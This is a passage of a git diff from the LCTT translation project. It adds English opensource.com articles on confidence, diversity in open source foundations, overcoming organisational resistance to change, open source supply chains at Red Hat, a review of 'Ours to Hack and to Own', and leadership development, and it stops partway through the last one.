center of the world. However, the initial justifications our egos made don't fully vanish. Understanding the importance of the ego in our social atmospheres can help you connect and relate to people. - -Working in collaboration and seeking out learning experiences will help you hone and develop both your social and technical skills. Constant learning is absolutely integral to advancing in the world of open source. - -What does this have to do with confidence? Not only do you work to improve someone else's confidence by showing them that you value this person's knowledge and input, you develop your own. There will be a moment when you become more flexible. You will at some point admit you don't know something. - -Confident people can say "I don't know" without an air of disappointment. - -### You reap what you sow - -You've heard the phrase "Fake it, 'til you make it"? Well, confidence is like many psychological phenomena. Actively telling yourself that you are smart, funny, interesting, talented, a good communicator, a good friend, unique, knowledgeable, a quick study, an introspective thinker, or whatever other aspect you want to be, will eventually result in you persuading yourself that this is true. And if it's true for you, it becomes true for other people. - -Call it the practice of self-affirmation. - -Additionally, in the world of open source how you think about and treat others is how they will think about and treat you. The Golden Rule is once again valid. If you want to be successful in open source, you have to be confident enough to stand up for what you believe in, but do so in a way that is welcoming and inclusive to other perspectives and opinions. The mark of a leader is someone who models the behaviors they want to see in the world, whether anyone else follows suit or not. - -Do you have other ways to develop confidence? Let us know in the comments! - --------------------------------------------------------------------------------- - -作者简介: - -![](https://opensource.com/sites/default/files/styles/profile_pictures/public/profilepicsq_0.jpg?itok=CVMJs36A) - -Laura Hilliger - Laura Hilliger is an artist, educator, writer and technologist. She's a multimedia designer and developer, a technical liaison, a project manager, an Open Web hacktivist who is happiest in collaborative environments. She's an advocate for change and is currently working to help open up Greenpeace. Alum @Mozilla, UC Berkeley, BAVC, Adobe. Find her onTwitter as @epilepticrabbit - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/1/3-ways-improve-your-confidence - -作者:[Laura Hilliger][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/laurahilliger -[1]:https://www.flickr.com/photos/42647587@N06/ diff --git a/sources/talk/20170119 Be a force for good in your community.md b/sources/talk/20170119 Be a force for good in your community.md index c58100cf63..8c1ce1fa69 100644 --- a/sources/talk/20170119 Be a force for good in your community.md +++ b/sources/talk/20170119 Be a force for good in your community.md @@ -1,3 +1,5 @@ + Translating by scoutydren + Be a force for good in your community ============================================================ diff --git a/sources/talk/20170120 How is your community promoting diversity.md b/sources/talk/20170120 How is your community promoting diversity.md new file mode 100644 index 0000000000..6b10faead7 --- /dev/null +++ b/sources/talk/20170120 How is your community promoting diversity.md @@ -0,0 +1,83 @@ +How is your community promoting diversity? +============================================================ + +> Open source foundation leaders weigh in. + + ![How is your community promoting diversity?](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/world_hands_diversity.png?itok=LMT5xbxJ "How is your community promoting diversity?") +Image by : opensource.com + +Open source software is a great enabler for technology innovation. Diversity unlocks innovation and drives market growth. Open source and diversity seem like the ultimate winning combination, yet ironically open source communities are among the least diverse tech communities. This is especially true when it comes to inherent diversity: traits such as gender, age, ethnicity, and sexual orientation. + +It is hard to get a true picture of the diversity of our communities in all the various dimensions. Gender diversity, by virtue of being noticeably lacking and more straight forward to measure, is the starting point and current yardstick for measuring diversity in tech communities. + +For example, it is estimated that around 25% of all software developers are women, but [only 3% work][5] in free and open software. These figures are consistent with my personal experience working in open source for over 10 years. + +Even when individuals in the community are [doing their best][6] (and I have worked with many who are), it seems to make little difference. And little has changed in the last ten years. However, we are, as a community, starting to have a better understanding of some of the factors that maintain this status quo, things like [unconscious bias][7] or [social graph and privilege][8] problems. + +In order to overcome the gravity of these forces in open source, we need combined efforts that are sustained over the long term and that really work. There is no better example of how diversity can be improved rapidly in a relatively short space of time than the Python community. PyCon 2011 consisted of just 1% women speakers. Yet in 2014, 33% of speakers at PyCon were women. Now Python conferences regularly lay out [their diversity targets and how they intend to meet them][9]. + +What did it take to make that dramatic improvement in women speaker numbers? In her great talk at PyCon 2014, [Outreach Program for Women: Lessons in Collaboration][10], Marina Zhurakhinskaya outlines the key ingredients: + +* The importance of having a Diversity Champion to spearhead the changes over the long term; in the Python community Jessica McKellar was the driving force behind the big improvement in diversity figures +* Specifically marketing to under-represented groups; for example, how GNOME used outreach programs, such as [Outreachy][1], to market to women specifically + +We know diversity issues, while complex are imminently fixable. In this way, open source foundations can play a huge role in the sustaining efforts to promote initiatives. Are other open source communities also putting efforts into diversity? To find out, we asked a few open source foundation leaders: + +### How does your foundation promote diversity in its open source community? + +**Mike Milinkovich, executive director of the Eclipse Foundation:** + +> "The Eclipse Foundation is committed to promoting diversity in its open source community. But that commitment does not mean that we are satisfied with where we are today. We have a long way to go, particularly in the area of gender diversity. That said, some of the tangible steps we've taken in the last couple of years are: (a) we put into place a [Community Code of Conduct][2] that covers all of our activities, (b) we are consciously recruiting women for our conference program committees, (c) we are consciously looking for women speakers for our conferences, including keynotes, and (d) we are supporting community channels to discuss diversity topics. It's been great to see members of our community step up to assume leadership roles on this topic, and we're looking forward to making a lot of progress in 2017." + +**Abby Kearns, executive director for the Cloud Foundry:** + +> "For Cloud Foundry we promote diversity in a variety of ways. For our community, this includes a heavy focus on diversity events at our summit, and on our keynote stage. I'm proud to say we doubled the representation by women and people of color at our last event. For our contributors, this takes on a slightly different meaning and includes diversification across company and role." + + A recent Cloud Foundry Summit featured a [diversity luncheon][11] as well as a [keynote on diversity][12], which highlighted how [gender parity had been achieved][13] by one member company's team. + +**Chris Aniszczyk, COO of the Cloud Native Computing Foundation:** + +> "The Cloud Native Computing Foundation (CNCF) is a very young foundation still, and although we are only one year old as of December 2016, we've had promoting diversity as a goal since our inception. First, every conference hosted by CNCF has [diversity scholarships][3] available, and there are usually special diversity lunches or events at the conference to promote inclusion. We've also sponsored "[contribute your first patch][4]" style events to promote new contributors from all over. These are just some small things we currently do. In the near future, we are discussing launching a Diversity Workgroup within CNCF, and also as we ramp up our certification and training programs, we are discussing offering scholarships for folks from under-representative backgrounds." + +Additionally, Cloud Native Computing Foundation is part of the [Linux Foundation][14] as a formal Collaborative Projects (along with other foundations, including Cloud Foundry Foundation). The Linux Foundation has extensive [Diversity Programs][15] and as an example, recently [partnered with the Girls In Tech][16] not-for-profit to improve diversity in open source. In the future, the CNCF actively plans to participate in these Linux Foundation wide initiatives as they arise. + +For open source to thrive, companies need to foster the right environment for innovation. Diversity is a big part of this. Seeing open source foundations making the conscious decision to take action is encouraging. Dedicated time, money, and resources to diversity is making a difference within communities, and we are slowly but surely starting to see the effects. Going forward, communities can collaborate and learn from each other about what works and makes a real difference. + +If you work in open source, be sure to ask and find out what is being done in your community as a whole to foster and promote diversity. Then commit to supporting these efforts and taking the steps toward making a real difference. It is exciting to think that the next ten years might be a huge improvement over the last 10, and we can start to envision a future of truly diverse open source communities, the ultimate winning combination. + +-------------------------------------------------------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/dsc_0182.jpg?itok=c_u-wggj) + +Tracy Miranda - Tracy Miranda is a software developer and founder of Kichwa Coders, a software consultancy specializing in Eclipse tools for scientific and embedded software. Tracy has been using Eclipse since 2003 and is actively involved in the community, particularly the Eclipse Science Working Group. Tracy has a background in electronics system design. She mentors young coders at the festival of code for Young Rewired State. Follow Tracy on Twitter @tracymiranda. + +-------------------------------------------------------------------------------- + + +via: https://opensource.com/article/17/1/take-action-diversity-tech + +作者:[ Tracy Miranda][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/tracymiranda +[1]:https://www.gnome.org/outreachy/ +[2]:https://www.eclipse.org/org/documents/Community_Code_of_Conduct.php +[3]:http://events.linuxfoundation.org/events/cloudnativecon-and-kubecon-north-america/attend/scholarship-opportunities +[4]:http://conferences.oreilly.com/oscon/oscon-tx-2016/public/schedule/detail/53257 +[5]:https://www.linux.com/blog/how-bring-more-women-free-and-open-source-software +[6]:https://trishagee.github.io/post/what_can_men_do/ +[7]:https://opensource.com/life/16/3/sxsw-diversity-google-org +[8]:https://opensource.com/life/15/8/5-year-plan-improving-diversity-tech +[9]:http://2016.pyconuk.org/diversity-target/ +[10]:https://www.youtube.com/watch?v=CA8HN20NnII +[11]:https://www.youtube.com/watch?v=LSRrc5B1an0&list=PLhuMOCWn4P9io8gtd6JSlI9--q7Gw3epW&index=48 +[12]:https://www.youtube.com/watch?v=FjF8EK2zQU0&list=PLhuMOCWn4P9io8gtd6JSlI9--q7Gw3epW&index=50 +[13]:https://twitter.com/ab415/status/781036893286854656 +[14]:https://www.linuxfoundation.org/about/diversity +[15]:https://www.linuxfoundation.org/about/diversity +[16]:https://www.linux.com/blog/linux-foundation-partners-girls-tech-increase-diversity-open-source diff --git a/sources/talk/20170126 A 5-step plan to encourage your team to make changes on your project.md b/sources/talk/20170126 A 5-step plan to encourage your team to make changes on your project.md new file mode 100644 index 0000000000..746c36edc7 --- /dev/null +++ b/sources/talk/20170126 A 5-step plan to encourage your team to make changes on your project.md @@ -0,0 +1,85 @@ +A 5-step plan to encourage your team to make changes on your project +============================================================ + + ![A 5-step plan to encourage your team to make changes on your project](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BIZ_Maze2.png?itok=egeRn990 "A 5-step plan to encourage your team to make changes on your project") +Image by : opensource.com + +Purpose is the first thing to consider when you're assembling any team. If one person could achieve that purpose, then forming the team would be unnecessary. And if there was no main purpose, then you wouldn't need a team at all. But as soon as the task requires more expertise than a single person has, we encounter the issue of collective participation—an issue that, if not handled properly, could derail you. + +Imagine a group of people trapped in a cave. No single person has full knowledge of how to get out, so everyone will need to work together, be open, and act collaboratively if they're going to do it. After (and only after) assembling the right task force can someone create the right environment for achieving the team's shared purpose. + +But some people are actually very comfortable in the cave and would like to just stay there. In organizations, how do leaders handle individuals who actually _resist_ productive change, people who are comfortable in the cave? And how do they go about finding people who do share their purpose but aren't in their organizations? + +I made a career conducting sales training internationally, but when I began, few people even thought my work had value. So, I somehow devised a strategy for convincing them otherwise. That strategy was so successful that I decided to study it in depth and [share it][2] with others. + +### Gaining support + +In established companies with strong corporate cultures, there are people that will fight change and, from behind the scenes, will fight any proposal for change. They want everyone to stay in that comfortable cave. When I was first approached to give overseas sales training, for example, I received heavy resistance from some key people. They pushed to convince others that someone in Tokyo could not provide sales training—only basic product training would be successful. + +I somehow solved this problem, but didn't really know how I did it at the time. So, I started studying what consultants recommend about how to change the thinking in companies that resisted to change. From one study by researcher [Laurence Haughton][3], I learned that for the average change proposal, 83% of people in your organization will not support you from the beginning. Roughly 17% _will_ support you from the beginning, but 60% of the people would support you only after seeing a pilot case succeed, when they can actually see that the idea is safe to try. Lastly, there are some people who will fight any change, no matter how good it is. + +Here are the steps I learned: + +* Start with a pilot project +* Outsmart the CAVE people +* Follow through fast +* Outsmart the CAVE bosses +* Move to full operation. + +### 1\. Start with a pilot project + +Find a project with both high value and a high chance for success—not a large, expensive, long-term, global activity. Then, find key people who can see the value of the project, who understand its value, and who will fight for it. These people should not just be "nice guys" or "friends"; they must believe in its purpose and have some skills/experience that will help move the project forward. And don't shoot for a huge success the first time. It should be just successful enough to permit you to learn and keep moving forward. + +In my case, I held my first sales seminar in Singapore at a small vehicle dealership. It was not a huge success, but it was successful enough that people started talking about what quality sales training could achieve. At that time, I was stuck in a cave (a job I didn't want to do). This pilot sales training was my road map to get out of my cave. + +### 2\. Outsmart the CAVE people + +CAVE is actually an acronym I learned from Laurence Haughton. It stands for Citizens Against Virtually Everything. + +You must identify these people, because they will covertly attempt to block any progress in your project, especially in the early stages when it is most vulnerable. They're easy to spot: They are always negative. They use "but," "if," and "why," in excess, just to stall you. They ask for detailed information when it isn't available easily. They spend too much time on the problem, not looking for any solution. They think every failure is the beginning of a trend. They often attack people instead of studying the problem. They make statements that are counterproductive but cannot be confirmed easily. + +Avoid the CAVE people; do not let them into the discussion of the project too early. They've adopted the attitude they have because they don't see value in the changes required. They are comfortable in the cave. So try to get them to do something else. You should seek out key people in the 17% group I mentioned above, people that want change, and have very private preparation meetings with them. + +When I was in Isuzu Motors (partly owned by General Motors), the sales training project started in a joint venture distribution company that sold to the smaller countries in the world, mainly in Africa, Southeast Asia, Latin America and the Middle East. My private team was made up of a GM person from Chevrolet, an Isuzu product planning executive and that distribution company's sales planning staff. I kept everyone else out of the loop. + +### 3\. Follow through fast + +CAVE people like to go slowly, so act quickly. Their ability to negatively influence your project will weaken if you have a small success story before they are involved—if you've managed to address their inevitable objections before they can even express them. Again, choose a pilot project with a high chance of success, something that can show quick results. Then promote that success, like a bold headline on an advertisement. + +Once the word of my successful seminar in Singapore began to circulate, other regions started realizing the benefits of sales training. Just after that Singapore seminar, I was commissioned to give four more in Malaysia. + +### 4\. Outsmart CAVE bosses + +Once you have your first mini-project success, promote the project in a targeted way to key leaders who could influence any CAVE bosses. Get the team that worked on the project to tell key people the success story. Front line personnel and/or even customers can provide powerful testimonials as well. CAVE managers often concern themselves only with sales and profits, so promote the project's value in terms of cost savings, reduced waste, and increased sales. + +From that first successful seminar in Singapore and others that followed, I promoted heavily their successes to key front line sales department staff handling Isuzu's direct sales channels and General Motors channels that really wanted to see progress. After giving their acceptance, they took their training requests to their superiors sighting the sales increase that occurred in the distribution company. + +### 5\. Move to full operation + +Once top management is on board, announce to the entire organization the successful pilot projects. Have discussions for expanding on the project. + +Using the above procedures, I gave seminars in more than 60 countries worldwide over a 21-year career. So I did get out of the cave—and really saw a lot of the world. + +-------------------------------------------------------------------------------- + +作者简介: + +Ron McFarland - Ron McFarland has been working in Japan for 40 years, and he's spent more than 30 of them in international sales, sales management training, and expanding sales worldwide. He's worked in or been to more than 80 countries. Over the past 14 years, Ron has established distributors in the United States and throughout Europe for a Tokyo-headquartered, Japanese hardware cutting tool manufacturer. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/open-organization/17/1/escape-the-cave + +作者:[Ron McFarland][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/ron-mcfarland +[1]:https://opensource.com/open-organization/17/1/escape-the-cave?rate=dBJIKVJy720uFj0PCfa1JXDZKkMwozxV8TB2qJnoghM +[2]:http://www.slideshare.net/RonMcFarland1/creating-change-58994683 +[3]:http://www.laurencehaughton.com/ +[4]:https://opensource.com/user/68021/feed +[5]:https://opensource.com/open-organization/17/1/escape-the-cave#comments +[6]:https://opensource.com/users/ron-mcfarland diff --git a/sources/talk/20170131 Be the open source supply chain.md b/sources/talk/20170131 Be the open source supply chain.md new file mode 100644 index 0000000000..84a31635d7 --- /dev/null +++ b/sources/talk/20170131 Be the open source supply chain.md @@ -0,0 +1,111 @@ +Be the open source supply chain +============================================================ + +### Learn why you should be a supply chain influencer. + + ![Be the open source supply chain](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/OSDC_BUS_ArchitectureOfParticipation_520x292.png?itok=tzfeycyR "Be the open source supply chain") +Image by :  + +opensource.com + +I would bet that whoever is best at managing and influencing the open source supply chain will be best positioned to create the most innovative products. In this article, I’ll explain why you should be a supply chain influencer, and how your organization can be an active participant in your supply chain. + +In my previous article, [Open source and the software supply chain][2], I discussed the basics of supply chain management, and where open source fits in this model. I left readers with this illustration of the model: + + ![supply chain](https://opensource.com/sites/default/files/f1_520_0.png "supply chain") + +The question to ask your employer and team(s) is: How do we best take advantage of this? After all, if Apple can set the stage for its dominance by creating a better hardware supply chain, then surely one can do the same with software supply chains. + +### Evaluating supply chains + +Having worked with developers and product teams in many companies, I learned that the process for selecting components that go into a product is haphazard. Sometimes there is an official bake-off of one or two components against each other, but the developers often choose to work with a product based on "feel". When determining the best components, you must evaluate based on those projects’ longevity, stage of development, and enough other metrics to form the basis of a "build vs. buy" decision. Number of users, interested parties, commercial activity, involvement of development team in support, and so on are a few considerations in the decision-making process. + +Over time, technology and business needs change, and in the world of open source software, even more so. Not only must an engineering and product team be able to select the best component at that time, they must also be able to switch it out for something else when the time comes—for example, when the community managing the old component moves on, or when a new component with better features emerges. + +### What not to do + +When evaluating supply chain components, teams are prone to make a number of mistakes, including these common ones: + +* **Not Invented Here (NIH)**: I can’t tell you how many times engineering teams decided to "fix" shortcomings in existing supply chain components by deciding to write it themselves. I won’t say "never ever do that," but I will warn that if you take on the responsibility of writing an infrastructure component, understand that you’re chucking away all the advantages of the open source supply chain—namely upstream testing and upstream engineering—and deciding to take on those tasks, immediately saddling your team (and your product) with technical debt that will only grow over time. You’re making the choice to be less efficient, and you had better have a compelling reason for doing so. +* **Carrying patches forward**: Any open source-savvy team understands the value of contributing patches to their respective upstream projects. When doing so, contributed code goes through that project’s automated testing procedures, which, when combined with your own team’s existing testing infrastructure, makes for a more hardened end product. Unfortunately, not all teams are open source-savvy. Sometimes these teams are faced with onerous legal requirements that deter them from seeking permission to contribute fixes upstream. In that case, encourage (i.e., nag) your manager to get blanket legal approval for such things, because the alternative is carrying all those changes forward, incurring significant technical debt, and applying patches until the day your project (or you) dies. +* **Think you’re only a user**: Using open source components as part of your software supply chain is only the first step. To reap the rewards of open source supply chains, you must dive in and be an influencer. (More on that shortly.) + +### Effective supply chain management example: Red Hat + +Because of its upstream-first policies, [Red Hat][3] is an example of how both to utilize and influence software supply chains. To understand the Red Hat model, you must view their products through a supply chain perspective. + +Products supported by Red Hat are composed of open source components often vetted by multiple upstream communities, and changes made to these components are pushed to their respective upstream projects, often before they land in a supported product from Red Hat. The work flow look somewhat like: + + ![workflow diagram](https://opensource.com/sites/default/files/f2_520_0.png "workflow diagram") + +There are multiple reasons for this kind of workflow: + +* Testing, testing, testing: By offloading some initial testing, a company like Red Hat benefits from both the upstream community’s testing, as well as the testing done by other ecosystem participants, including competitors. +* Upstream viability: The Red Hat model only works as long as upstream suppliers are viable and self-sustaining. Thus, it’s in Red Hat’s interest to make sure those communities stay healthy. +* Engineering efficiency: Because Red Hat offloads common tasks to upstream communities, their engineers spend more time adding value to products for customers. + +To understand the Red Hat approach to supply chain, let’s look at their approach to product development with OpenStack. + +Curiously, Red Hat’s start with OpenStack was not to create a product or even to announce one; rather, they started pushing engineering resources into strategic projects in OpenStack (starting with Nova, Keystone, and Cinder). This list grew to include several other projects in the OpenStack community. A more traditional product management executive might look at this approach and think, "Why on earth would we contribute so much engineering to something that isn’t established and has no product? Why are we giving our competitors our work for free?" + +Instead, here is the open source supply chain thought process: + +### Step 1 + +Look at growth areas in the business or largest product gaps that need filling. Is there an open source community that fits a strategic gap? Or can we build a new project from scratch to do the same? In this case, Red Hat looked at the OpenStack community and eventually determined that it would fill a gap in the product portfolio. + +### Step 2 + +Gradually turn up the dial on engineering resources. This does a couple of things. First, it helps the engineering team get a sense of the respective projects’ prospects for success. If prospects aren’t not good, the company can stop contributing, with minimal investment spent. Once the project is determined to be worth in the investment, to the company can ensure its engineers will influence current and future development. This helps the project with quality code development, and ensures that the code meets future product requirements and acceptance criteria. Red Hat spent a lot of time slinging code in OpenStack repositories before ever announcing an OpenStack product, much less releasing one. But this was a fraction of the investment that would have been made if the company had developed an IaaS product from scratch. + +### Step 3 + +Once the engineering investments begin, start a product management roadmap and marketing release plan. Once the code reaches a minimum level of quality, fork the upstream repository and start working on product-specific code. Bug fixes are pushed upstream to openstack.org and into product branches. (Remember: Red Hat’s model depends on upstream viability, so it makes no sense not to push fixes upstream.) + +Lather, rinse, repeat. This is how you manage an open source software supply chain. + +### Don't accumulate technical debt + +If needed, Red Hat could decide that it would simply depend on upstream code, supply necessary proprietary product glue, and then release that as a product. This is, in fact, what most companies do with upstream open source code; however, this misses a crucial point I made previously. To develop a really great product, being heavily involved in the development process helps. How can an organization make sure that the code base meets its core product criteria if they’re not involved in the day-to-day architecture discussions? + +To make matters worse, in an effort to protect backwards compatibility and interoperability, many companies fork the upstream code, make changes and don't contribute them upstream, choosing instead to carry them forward internally. That is a big no-no, saddling your engineering team forever with accumulated technical debt that will only grow over time. In that scenario, all the gains made from upstream testing, development and release go away in a whiff of stupidity. + +### Red Hat and OpenShift + +Once you begin to understand Red Hat’s approach to supply chain, which you can see manifested in its approach to OpenStack, you can understand its approach to OpenShift. Red Hat first released OpenShift as a proprietary product that was also open sourced. Everything was homegrown, built by a team that joined Red Hat as part of the [Makara acquisition][4] in 2010. + +The technology initially suffered from NIH—using its own homegrown clustering and container management technologies, in spite of the recent (at the time) release of new projects: Kubernetes, Mesos, and Docker. What Red Hat did next is a testament to the company’s commitment to its open source supply chain model: Between OpenShift versions 2 and 3, developers rewrote it to utilize and take advantage of new developments from the Kubernetes and Docker communities, ditching their NIH approach. By restructuring the project in that way, the company took advantage of economies of scale that resulted from the burgeoning developer communities for both projects. I + +Instead of Red Hat fashioning a complete QC/QA testing environment for the entire OpenShift stack, they could rely on testing infrastructure supplied by the Docker and Kubernetes communities. Thus, Red Hat contributions to both the Docker and Kubernetes code bases would undergo a few rounds of testing before ever reaching the company’s own product branches: + +1. The first round of testing is by the Docker and Kubernetes communities . +2. Further testing is done by ecosystem participants building products on either or both projects. +3. More testing happens on downstream code distributions or products that "embed" both projects. +4. Final testing happens in Red Hat’s own product branch. + +The amount of upstream (from Red Hat) testing done on the code ensures a level of quality that would be much more expensive for the company to do comprehensively and from scratch. This is the trick to open source supply chain management: Don’t just consume upstream code, minimally shimming it into a product. That approach won’t give you any of the advantages offered by open source development practices and direct participation for solving your customers’ problems. + +To get the most benefit from the open source software supply chain, you must **be** the open source software supply chain. + +-------------------------------------------------------------------------------- + +作者简介: + +John Mark Walker - John Mark Walker is Director of Product Management at Dell EMC and is responsible for managing the ViPR Controller product as well as the CoprHD open source community. He has led many open source community efforts, including ManageIQ, + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/be-open-source-supply-chain + +作者:[John Mark Walker][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/johnmark +[1]:https://opensource.com/article/17/1/be-open-source-supply-chain?rate=sz6X6GSpIX1EeYBj4B8PokPU1Wy-ievIcBeHAv0Rv2I +[2]:https://opensource.com/article/16/12/open-source-software-supply-chain +[3]:https://www.redhat.com/en +[4]:https://www.redhat.com/en/about/press-releases/makara +[5]:https://opensource.com/user/11815/feed diff --git a/sources/talk/20170131 Book review Ours to Hack and to Own.md b/sources/talk/20170131 Book review Ours to Hack and to Own.md new file mode 100644 index 0000000000..1405bfe34a --- /dev/null +++ b/sources/talk/20170131 Book review Ours to Hack and to Own.md @@ -0,0 +1,63 @@ +Book review: Ours to Hack and to Own +============================================================ + + ![Book review: Ours to Hack and to Own](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/EDUCATION_colorbooks.png?itok=liB3FyjP "Book review: Ours to Hack and to Own") +Image by : opensource.com + +It seems like the age of ownership is over, and I'm not just talking about the devices and software that many of us bring into our homes and our lives. I'm also talking about the platforms and services on which those devices and apps rely. + +While many of the services that we use are free, we don't have any control over them. The firms that do, in essence, control what we see, what we hear, and what we read. Not only that, but many of them are also changing the nature of work. They're using closed platforms to power a shift away from full-time work to the [gig economy][2], one that offers little in the way of security or certainty. + +This move has wide-ranging implications for the Internet and for everyone who uses and relies on it. The vision of the open Internet from just 20-odd-years ago is fading and is rapidly being replaced by an impenetrable curtain. + +One remedy that's becoming popular is building [platform cooperatives][3], which are digital platforms that their users own. The idea behind platform cooperatives has many of the same roots as open source, as the book "[Ours to Hack and to Own][4]" explains. + +Scholar Trebor Scholz and writer Nathan Schneider have collected 40 essays discussing the rise of, and the need for, platform cooperatives as tools ordinary people can use to promote openness, and to counter the opaqueness and the restrictions of closed systems. + +### Where open source fits in + +At or near the core of any platform cooperative lies open source; not necessarily open source technologies, but the principles and the ethos that underlie open source—openness, transparency, cooperation, collaboration, and sharing. + +In his introduction to the book, Trebor Scholz points out that: + +> In opposition to the black-box systems of the Snowden-era Internet, these platforms need to distinguish themselves by making their data flows transparent. They need to show where the data about customers and workers are stored, to whom they are sold, and for what purpose. + +It's that transparency, so essential to open source, which helps make platform cooperatives so appealing and a refreshing change from much of what exists now. + +Open source software can definitely play a part in the vision of platform cooperatives that "Ours to Hack and to Own" shares. Open source software can provide a fast, inexpensive way for groups to build the technical infrastructure that can power their cooperatives. + +Mickey Metts illustrates this in the essay, "Meet Your Friendly Neighborhood Tech Co-Op." Metts works for a firm called Agaric, which uses Drupal to build for groups and small business what they otherwise couldn't do for themselves. On top of that, Metts encourages anyone wanting to build and run their own business or co-op to embrace free and open source software. Why? It's high quality, it's inexpensive, you can customize it, and you can connect with large communities of helpful, passionate people. + +### Not always about open source, but open source is always there + +Not all of the essays in this book focus or touch on open source; however, the key elements of the open source way—cooperation, community, open governance, and digital freedom—are always on or just below the surface. + +In fact, as many of the essays in "Ours to Hack and to Own" argue, platform cooperatives can be important building blocks of a more open, commons-based economy and society. That can be, in Douglas Rushkoff's words, organizations like Creative Commons compensating "for the privatization of shared intellectual resources." It can also be what Francesca Bria, Barcelona's CTO, describes as cities running their own "distributed common data infrastructures with systems that ensure the security and privacy and sovereignty of citizens' data." + +### Final thought + +If you're looking for a blueprint for changing the Internet and the way we work, "Ours to Hack and to Own" isn't it. The book is more a manifesto than user guide. Having said that, "Ours to Hack and to Own" offers a glimpse at what we can do if we apply the principles of the open source way to society and to the wider world. + +-------------------------------------------------------------------------------- + +作者简介: + +Scott Nesbitt - Writer. Editor. Soldier of fortune. Ocelot wrangler. Husband and father. Blogger. Collector of pottery. Scott is a few of these things. He's also a long-time user of free/open source software who extensively writes and blogs about it. You can find Scott on Twitter, GitHub + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/review-book-ours-to-hack-and-own + +作者:[Scott Nesbitt][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/scottnesbitt +[1]:https://opensource.com/article/17/1/review-book-ours-to-hack-and-own?rate=dgkFEuCLLeutLMH2N_4TmUupAJDjgNvFpqWqYCbQb-8 +[2]:https://en.wikipedia.org/wiki/Access_economy +[3]:https://en.wikipedia.org/wiki/Platform_cooperative +[4]:http://www.orbooks.com/catalog/ours-to-hack-and-to-own/ +[5]:https://opensource.com/user/14925/feed +[6]:https://opensource.com/users/scottnesbitt diff --git a/sources/talk/20170131 Developing open leaders.md b/sources/talk/20170131 Developing open leaders.md new file mode 100644 index 0000000000..356e55b6eb --- /dev/null +++ b/sources/talk/20170131 Developing open leaders.md @@ -0,0 +1,74 @@ +Developing open leaders +============================================================ + +> "Off-the-shelf" leadership training can't sufficiently groom tomorrow's organizational leaders. Here's how we're doing it. + + ![Developing open leaders](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BUSINESS_community2.png?itok=ILQK65F1 "Developing open leaders") +Image by : opensource.com + +At Red Hat, we have a saying: Not everyone needs to be a people manager, but everyone is expected to be a leader. + +For many people, that requires a profound mindset shift in how to think about leaders. Yet in some ways, it's what we all intuitively know about how organizations really work. As Red Hat CEO Jim Whitehurst has pointed out, in any organization, you have the thermometers—people who reflect the organizational "temperature" and sentiment and direction—and then you have the thermostats—people who _set_ those things for the organization. + +Leadership is about maximizing influence and impact. But how do you develop leadership for an open organization? + +In the first installment of this series, I will share the journey, from my perspective, on how we began to build a leadership development system at Red Hat to enable our growth while sustaining the best parts of our unique culture. + +### Nothing 'off the shelf' + +In an open organization, you can't just buy leadership development training "off the shelf" and expect it to resonate with people—or to reflect and reinforce your unique culture. But you also probably won't have the capacity and resources to build a great leadership development system entirely from scratch. + +Early on in our journey at Red Hat, our leadership development efforts focused on understanding our own philosophy and approach, then taking a bit of an open source approach: sifting through the what people had created for conventional organizations, then configuring those ideas in a way that made them feasible for an open organization. + +Looking back, I can also see we spent a lot of energy looking for ways to plug specific capability gaps. + +Many of our people managers were engineers and other subject matter experts who stepped into management roles because that's what our organization needed. Yet the reality was, many had little experience leading a team or group. So we had some big gaps in basic management skills. + +We also had gaps—not just among managers but also among individual contributors—when it came to navigating tough conversations with respect. In a company where passion runs high and people love to engage in open and heated debate, making your voice heard without shouting others down wasn't always easy. + +We couldn't find any end-to-end leadership development systems that would help train people for leading in a culture that favors flatness and meritocracy over hierarchy and seniority. And while we could build some of those things ourselves, we couldn't build everything fast enough to meet our growing organization's needs. + +So when we saw a need for improved goal setting, we introduced some of the best offerings available—like Closing the Execution Gap and the concept of SMART goals (i.e. specific, measurable, attainable, relevant, and time-bound). To make these work for Red Hat, we configured them to pull through themes from our own culture that could be used in tandem to make the concepts resonate and become even more powerful. + +### Considering meritocracy + +In a culture that values meritocracy, being able to influence others is critical. Yet the passionate open communication and debate that we love at Red Hat sometimes created hard feelings between individuals or teams. We introduced [Crucial Conversations][2] to help everyone navigate those heated and impassioned topics, and also to help them recognize that those kinds of conversations provide the greatest opportunity for influence. + +After building that foundation with Crucial Conversations, we introduced [Influencer Training][3] to help entire teams and organizations communicate and gain traction for their ideas across boundaries. + +We also found a lot of value in Marcus Buckingham's strengths-based approach to leadership development, rather than the conventional models that encouraged people to spend their energy shoring up weaknesses. + +Early on, we made a decision to make our leadership offerings available to individual contributors as well as managers, because we saw that these skills were important for everyone in an open organization. + +Looking back, I can see that this gave us the added benefit of developing a shared understanding and language for talking about leadership throughout our organization. It helped us build and sustain a culture where leadership is expected at all levels and in any role. + +At the same time, training was only part of the solution. We also began developing processes that would help entire departments develop important 